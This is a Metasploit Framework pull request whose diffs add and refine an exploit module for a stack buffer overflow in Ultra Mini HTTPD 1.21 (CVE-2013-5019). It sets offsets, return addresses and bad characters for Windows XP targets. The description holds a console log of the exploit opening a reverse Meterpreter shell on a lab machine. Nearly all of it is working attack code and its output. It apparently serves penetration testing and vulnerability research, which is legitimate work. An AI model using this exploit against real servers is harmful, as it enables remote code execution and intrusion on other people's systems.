### PR TITLE
Ultra Mini HTTPD 1.21 Stack Buffer Overflow

### DIFF
--- a/modules/exploits/windows/http/ultraminihttp_bof.rb
+++ b/modules/exploits/windows/http/ultraminihttp_bof.rb
@@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Egghunter
 
 	def initialize(info={})
 		super(update_info(info,
@@ -38,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'Space' => 1623,
 					'StackAdjustment' => -3500,
-					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20"
+					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f"
 				},
 			'DefaultOptions'  =>
 				{

--- a/modules/exploits/windows/http/ultraminihttp_bof.rb
+++ b/modules/exploits/windows/http/ultraminihttp_bof.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Jul 10 2013'
-			)
+			))
 
 			register_options(
 				[

--- a/modules/exploits/windows/http/ultraminihttp_bof.rb
+++ b/modules/exploits/windows/http/ultraminihttp_bof.rb
@@ -48,32 +48,20 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					[
-						'v1.21 - Windows XP SP2 ENG',
+						'v1.21 - Windows XP SP3',
 						{
 							'Offset' => 5412,
-							'Ret'=>0x73E32ECF #jmp esp - mfc42.dll
-						}
-					],
-					[
-						'v1.21 - Windows XP SP3 ENG',
-						{
-							'Offset' => 5412,
-							'Ret'=>0x7e429353 #jmp esp - user32.dll
+							'Ret'=>0x77c35459 # push esp / ret - msvcrt.dll
 						}
 					]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Jul 10 2013'
 			))
-
-			register_options(
-				[
-					OptPort.new('RPORT', [true, 'The remote port', 80])
-				], self.class)
 	end
 
 	def exploit
-		buf = rand_text_alpha(target['Offset'])
+		buf = rand_text(target['Offset'])
 		buf << [target.ret].pack("V*")
 		buf << payload.encoded
 

--- a/modules/exploits/windows/http/ultraminihttp_bof.rb
+++ b/modules/exploits/windows/http/ultraminihttp_bof.rb
@@ -77,7 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		buf << [target.ret].pack("V*")
 		buf << payload.encoded
 
-		print_status("Buf length: #{buf.length}")
 		print_status("Sending buffer...")
 		send_request_cgi({
 				'method' => 'GET',

--- a/modules/exploits/windows/http/ultraminihttp_bof.rb
+++ b/modules/exploits/windows/http/ultraminihttp_bof.rb
@@ -1,0 +1,87 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Egghunter
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Ultra Mini HTTPD Stack Buffer Overflow",
+			'Description'    => %q{
+					This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21
+				allowing remote attackers to execute arbitrary code via a long resource name in an HTTP
+				request.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'superkojiman',  #Discovery, PoC
+					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '95164'],
+					['EDB','26739'],
+					['CVE','2013-5019'],
+					['BID','61130']
+				],
+			'Payload'        =>
+				{
+					'Space' => 1623,
+					'StackAdjustment' => -3500,
+					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "thread"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[
+						'v1.21 - Windows XP SP2 ENG',
+						{
+							'Offset' => 5412,
+							'Ret'=>0x73E32ECF #jmp esp - mfc42.dll
+						}
+					],
+					[
+						'v1.21 - Windows XP SP3 ENG',
+						{
+							'Offset' => 5412,
+							'Ret'=>0x7e429353 #jmp esp - user32.dll
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Jul 10 2013'
+			)
+
+			register_options(
+				[
+					OptPort.new('RPORT', [true, 'The remote port', 80])
+				], self.class)
+	end
+
+	def exploit
+		buf = rand_text_alpha(target['Offset'])
+		buf << [target.ret].pack("V*")
+		buf << payload.encoded
+
+		print_status("Buf length: #{buf.length}")
+		print_status("Sending buffer...")
+		send_request_cgi({
+				'method' => 'GET',
+				'uri'    => "/#{buf}"
+		})
+	end
+end

--- a/modules/exploits/windows/http/ultraminihttp_bof.rb
+++ b/modules/exploits/windows/http/ultraminihttp_bof.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						'v1.21 - Windows XP SP3',
 						{
 							'Offset' => 5412,
-							'Ret'=>0x77c35459 # push esp / ret - msvcrt.dll
+							'Ret'=>0x77c354b4 # push esp / ret - msvcrt.dll
 						}
 					]
 				],


### PR DESCRIPTION
Implements stack buffer overflow in Ultra HTTPD 1.21 (CVE-2013-5019). PoC and vulnerable app from EDB 26739:
http://www.exploit-db.com/exploits/26739/

Windows XP SP3 ENG target:

```
msf exploit(ultraminihttp_bof) > show options

Module options (exploit/windows/http/ultraminihttp_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.56.101   yes       The target address
   RPORT    80               yes       The remote port
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   v1.21 - Windows XP SP3 ENG


msf exploit(ultraminihttp_bof) > exploit

[*] Started reverse handler on 192.168.56.1:4444 
[*] Buf length: 7039
[*] Sending buffer...
[*] Sending stage (751104 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1584) at 2013-08-11 16:06:13 -0400

meterpreter > getuid
Server username: VulnDevXPSP3\VulnUser
meterpreter > sysinfo
Computer        : VulnDevXPSP3
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
```
